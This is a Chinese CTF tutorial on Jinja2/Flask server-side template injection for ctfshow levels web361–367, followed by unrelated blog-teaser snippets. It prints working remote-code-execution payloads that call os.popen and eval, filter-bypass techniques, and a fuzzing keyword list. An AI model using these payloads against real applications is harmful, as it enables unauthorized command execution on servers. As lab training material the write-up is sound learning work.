ctfshowweb入门 SSTI模板注入专题保姆级教程(一)

ctfshowweb入门 SSTI模板注入专题保姆级教程(一)

前言:本来这篇是不打算写的,自己稍微记录一下就行了,但是我发现后面的题难度也挺大的,而且好多更细的不记录后面也容易忘记,并且网上很多师傅讲的直接是payload(我还是太菜了看不懂),有很多都是我没见到过的,因此这里综合记录一下(其实最重要的是在这里写的能保存成pdf)同时也是对自己找的资料进行一个汇总

web361

这里我之前详细讲过了就不再赘述,ctfshowweb361--一道题从0入门SSTI模板注入,这里面也是直接从0基础讲起,如果还是有不懂的网上再找点资料看看【我最后也放了参考】,后续题目都是在这基础上进行的,熟悉了361的方法之后才能继续做后面题目。

web362

按照之前的方法进行尝试,发现过滤了除1和7以外的数字,而我们要找的是132,因此这里可以采用全角符号绕过【具体怎么开问下AI就行,因为我用的是Windows自带的,在设置里面进行设置,然后可能有的人用了其他输入法之类的,所以这里就不上图了】

实在找不到的话我直接打在下面:

1234567890 (全角 可以对比半角:1234567890)

然后就是输入我们的payload:

?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} ?name={{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat /flag").read()')}} 

或者可以不输入数字,之前在361中我们用到了config:

?name={{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}

然后我在网上找别的师傅的wp时看到了另一种:

?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}} x 任意存在的变量(可能是未定义的,触发错误时暴露信息) .__init__ 获取变量x的初始化方法 .__globals__ 获取该方法所在的全局命名空间 ['__builtins__'] 从全局空间中取出内置函数模块 .eval() 调用eval函数执行代码 '__import__("os").popen("cat /flag").read()' 要执行的Python代码

它比传统的 ''.__class__.__bases__[0].__subclasses__() 更简洁,而且可能绕过一些针对特定类名的过滤,但是当x不存在(未定义)时,会返回空或者报错,这时候还可以用的方法为用确实存在的方法替换x:

?name={{ lipsum.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()') }} # 生成lorem ipsum文本的函数(模板全局变量,几乎一定有,并且最稳定) ?name={{ url_for.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()') }} #URL生成函数(Flask特有的上下文变量) ?name={{ get_flashed_messages.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()') }} # flash消息函数 Flask特有的上下文变量 ?name={{ self.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()') }}

那这些就跟之前的config差不多了。

web363

这里测试了一下过滤了单双引号,而这个可以用request绕过【允许我们把字符串从模板内部"移"到URL参数中,从而避免在模板代码里直接使用引号】

属性作用绕过场景
request.argsGET请求参数args被过滤时可用values
request.valuesGET和POST所有参数最常用,替代args
request.cookiesCookie中的值当参数也被过滤时
request.headersHTTP头终极备选
request.formPOST表单数据需要POST请求

这里选一个就行,但是要注意不同属性后面参数放的位置:

?name={{ config.__class__.__init__.__globals__[request.values.a].popen(request.values.b).read() }} &a=os &b=cat /flag

也可以构造空字符串:

web364

这里过滤了args和引号

?name={{ config.__class__.__init__.__globals__[request.values.a].popen(request.values.b).read() }}&a=os&b=cat /flag ?name={{x.__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}} cookie传值 Cookie:x1=__builtins__;x2=__import__('os').popen('cat /flag').read() 

然后这里其实还可以用chr函数来做,但有点麻烦,所以放到后面再讲。

web365

一个个尝试的话其实过滤多了就有点麻烦,所以这里找AI要个字典fuzz一波:

[ ] _ { } {{ }} {% %} {%if {%endif {%print( 1 2 3 4 5 6 7 8 9 0 ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ 0 1 2 3 4 5 6 7 8 9 ' " + %2B %2b / // \\ \ %0a %0d %09 %20 %2f join() join u os popen system exec eval open read __import__ importlib linecache subprocess Popen commands pty platform sys |attr() |attr request args value cookie headers environ session g config app self lipsum cycler url_for current_app get_flashed_messages __class__ __base__ __bases__ __mro__ __subclasses__ __subclasses__() __builtins__ __init__ __globals__ __dict__ __dic__ __getattribute__ __getattribute__() __getitem__ __getitem__() __str__ __str__() __call__ __name__ __module__ _wrap_close catch_warnings WarningMessage _Printer

具体怎么fuzz的话就是hackbar里先输入如下,开代理后再execute

然后bp里面发送到intruder,依旧sniper,设个爆破点:

然后长度点一下排个序,发现有几个不一样的,再看看响应就行,那么从这里就看出过滤了中括号,引号和args:

这里就可以使用 __getitem__() 方法

# 原写法 {{ [].__class__.__bases__[0] }} # ↑中括号 # 绕过写法 {{ [].__class__.__bases__.__getitem__(0) }} # ↑用__getitem__()代替

具体payload如下:

?name={{config.__class__.__init__.__globals__.__getitem__(request.values.a).popen(request.values.b).read()}} &a=os &b=cat /flag 或者不用中括号: ?name={{x.__init__.__globals__.__builtins__.eval(request.values.cmd)}} &cmd=__import__('os').popen('cat /f*').read()

web366

fuzz一波发现又增加了对下划线的过滤:

这里用到的是|attr()过滤器

# 原写法 {{ lipsum.__globals__ }} # 绕过(直接用字符串,但需要绕过引号) {{ lipsum|attr('__globals__') }} # 绕过 + 引号过滤(结合request) {{ lipsum|attr(request.values.a) }} &a=__globals__

这里的话因为request要用的比较多,因此可以这么写:

?name={% set c=request.values %}{{ config|attr(c.a)|attr(c.b)|attr(c.c)|attr(c.d)(c.e)|attr(c.f)(c.g)|attr(c.h)() }} &a=__class__ &b=__init__ &c=__globals__ &d=__getitem__ &e=os &f=popen &g=cat /flag &h=read {% set c = request.values %} # ↑ ↑ ↑ # 标签 变量名 值 {% ... %}:Jinja2的语句标签,用来执行逻辑操作 set:赋值关键字 c:要创建的变量名 request.values:要赋给变量的值 这样可以简化代码 # 不赋值,每次都要写长长一串 ?name={{ request.values.a }}{{ request.values.b }}{{ request.values.c }} # 赋值后,代码简洁多了 ?name={% set c=request.values %}{{ c.a }}{{ c.b }}{{ c.c }}

同样这里也可用别的进行简化,流程图如下:

# 从lipsum出发(最短)
{{ lipsum.__globals__['os'].popen('cat /flag').read() }}

# 从url_for出发
{{ url_for.__globals__['os'].popen('cat /flag').read() }}

# 从config出发(需要多走两步)
{{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}

# 从request出发
{{ request.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}

因此这里我们可以用最短的lipsum出发,但是构造的时候直接硬写有点懵,还是换成一步步来:

第 1 步:|attr() 代替 .

lipsum|attr('__globals__') 这里的globals后面转成values

第 2 步:__getitem__() 代替 []

|attr('__getitem__')('os') os同样转为values

第 3 步:继续 |attr() 取 .popen

|attr('popen')('cat /flag')

第 4 步:最后 .read() 也是 |attr('read')()

那么我们最终生成这样的:

{% set c = request.values %} {{ lipsum |attr(c.a) # __globals__ |attr(c.b)(c.c) # __getitem__('os') |attr(c.d)(c.e) # popen('cat /flag') |attr(c.f)() # read() }} &a=__globals__ &b=__getitem__ &c=os &d=popen &e=cat /flag &f=read

(也是长开了)

web367

fuzz一下过滤了'' 、""、 [、 args、os、 _,然后这里上一题的也能还能用,然后网上看到别的师傅提到的:

{{lipsum.__globals.os}} {{lipsum|attr(request.values.q)|attr(request.values.o)}}&q=__globals__&o=os //这个不会执行 {{(lipsum|attr(request.values.q)).get(request.values.o)}}&q=__globals__&o=os //这个会执行 第一种写法不会执行,是因为 attr() 返回的是一个对象,我们不能直接用另一个 attr() 去获取这个对象的“键”。 第二种写法会执行,是因为它先用 attr() 拿到了 __globals__ 这个字典,然后显式地用 .get() 方法去取这个字典里的 'os' 键对应的值。

1. 为什么 {{lipsum|attr(request.values.q)|attr(request.values.o)}} 不工作?

  • lipsum|attr(request.values.q):这部分是正确的,它成功获取了 lipsum.__globals__ 这个字典。
  • |attr(request.values.o):问题出在这里。管道符 | 后面的 attr() 过滤器,它的作用是获取前一个结果对象的“属性”
  • lipsum.__globals__ 是一个字典。我们想要的是这个字典里键为 'os' 的(也就是 os 模块)。但 'os' 是字典的,不是这个字典对象的属性
    • 属性 是通过点号访问的,比如 __globals__.items(),这里的 items 就是属性。
    •  是通过中括号访问的,比如 __globals__['os']
  • 所以,我们用 attr() 去获取一个名为 'os' 的属性,但这个字典对象并没有一个叫 'os' 的属性,因此它返回 None 或者报错(取决于模板引擎的严格程度)。最终得不到 os 模块。

2. 为什么 {{(lipsum|attr(request.values.q)).get(request.values.o)}} 会执行?

这行代码巧妙地改变了操作顺序:

  • (lipsum|attr(request.values.q)):括号里的部分优先执行,成功拿到了 __globals__ 这个字典。
  • .get(request.values.o):拿到字典之后,这里使用了 Python 字典的原生方法 .get(key).get() 是 __globals__ 这个字典对象的方法(属性之一),专门用来根据键取值。我们把 request.values.o (值是 'os')作为参数传给它,它就能正确地从字典里取出 os 模块。

因此这里可以用的payload为:

?name={{(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}&a=__globals__&b=os&c=cat /flag

后面的涉及的方法比较多样,并且比较复杂(盲注、反弹shell啥的),同时为了在写详细的基础上保持观感,所以就分成两块来写。

Read more

【Linux网络系列】:JSON+HTTP,用C++手搓一个web计算器服务器!

【Linux网络系列】:JSON+HTTP,用C++手搓一个web计算器服务器!

🔥 本文专栏:Linux网络Linux实践系列 🌸作者主页:努力努力再努力wz 💪 今日博客励志语录:别害怕选错,人生最遗憾的从不是‘选错了’,而是‘我本可以’。每一次推倒重来的勇气,都是在给灵魂贴上更坚韧的勋章。 ★★★ 本文前置知识: 序列化与反序列化 引入 在之前的博客中,我详细介绍了序列化 与反序列化 的概念。对于使用 TCP 协议进行通信的双方,由于 TCP 是面向字节流的,在发送数据之前,我们通常需要定义一种结构化的数据来描述传输内容,并以此作为数据的容器。在 C++ 中,这种结构化数据通常表现为对象或结构体。然而,我们不能直接将结构体内存中对应的字节原样发送到另一端,因为直接传递内存字节会引发字节序 和结构体内存对齐 的问题。不同平台、不同编译器所遵循的内存对齐规则可能不同,这可能导致接收方在解析结构体字段时出现错误。 因此,我们需要借助序列化 。序列化 是指将结构化的数据按照预定的规则转换为连续的字节流。其主要目的是屏蔽平台差异,使得位于不同平台的进程能够以统一的方式解析该字节流。序列化通常分为两种形式:文本序列化 与二进制序列化 。 文

超酷!前端人必备的 3 个 Skills:搞定高级 UI,拿捏最佳实践,最后一个直接拉满“续航”!

最近和几位前端开发者聊天,发现一个有趣的现象:AI 写代码越来越快,但代码质量的差距反而越来越大。 有人用 Cursor 写出来的页面,一眼就能看出是 AI 生成的——紫色渐变背景、Inter 字体、千篇一律的卡片布局。而有的人用同样的工具,却能产出让人眼前一亮的作品。 差距在哪里?不在 AI 工具本身,而在于你给 AI 注入了什么样的"技能包" 。 今天想分享前端开发必备的三个 Skills。前两个是干货分享,能立刻提升你的代码质量;第三个可能出乎你的意料,但确实是我最近的真实体会。 Skill 1: 让 AI 懂设计,告别"AI 味"的界面 你有没有遇到过这种情况——AI 生成的页面虽然能用,但总觉得哪里不对劲? 布局平庸、配色单调、

前端如何渲染 Markdown 格式:从基础到实战全指南

在前端开发中,我们常需要将 Markdown 文本(如接口文档、博客内容、用户评论)渲染成美观的 HTML 页面。不同于纯文本展示,Markdown 渲染需要借助专门的库解析语法规则,再结合样式实现可视化。本文将聚焦 “如何在前端页面中渲染 Markdown 内容”,从主流库选型到实战案例,带你快速掌握核心方法。 一、前端渲染 Markdown 的核心逻辑 Markdown 本质是 “轻量级标记语言”,无法直接被浏览器识别。前端渲染的核心流程是: 1. 解析:通过库将 Markdown 文本(如 # 标题)转换为 HTML 字符串(如 <h1>标题</h1>); 2. 渲染:将解析后的

Rust与WebAssembly深度实战——将高性能Rust代码运行在浏览器与Node.js

Rust与WebAssembly深度实战——将高性能Rust代码运行在浏览器与Node.js

Rust与WebAssembly深度实战——将高性能Rust代码运行在浏览器与Node.js 一、学习目标与重点 1.1 学习目标 1. 理解WebAssembly基础:深入掌握WebAssembly(Wasm/Wasmtime)的核心定义、运行机制、与JavaScript的性能对比 2. 掌握Rust到Wasm的编译:熟练使用wasm-pack、cargo-web等工具链,完成Rust代码到Wasm模块的编译、打包、优化 3. 精通Rust与JavaScript交互:实现双向交互(Rust调用JS函数、JS调用Rust函数),处理复杂数据类型(数组、对象、字符串),管理内存(Wasm线性内存的分配与释放) 4. 开发真实Wasm应用:编写浏览器端高性能任务(Canvas图像滤镜、WebGL计算辅助)、Node.js端计算密集型任务(图像处理、加密解密、数据压缩) 5. 优化Wasm模块:使用wasm-opt工具优化Wasm体积,学习代码分割、懒加载、模块缓存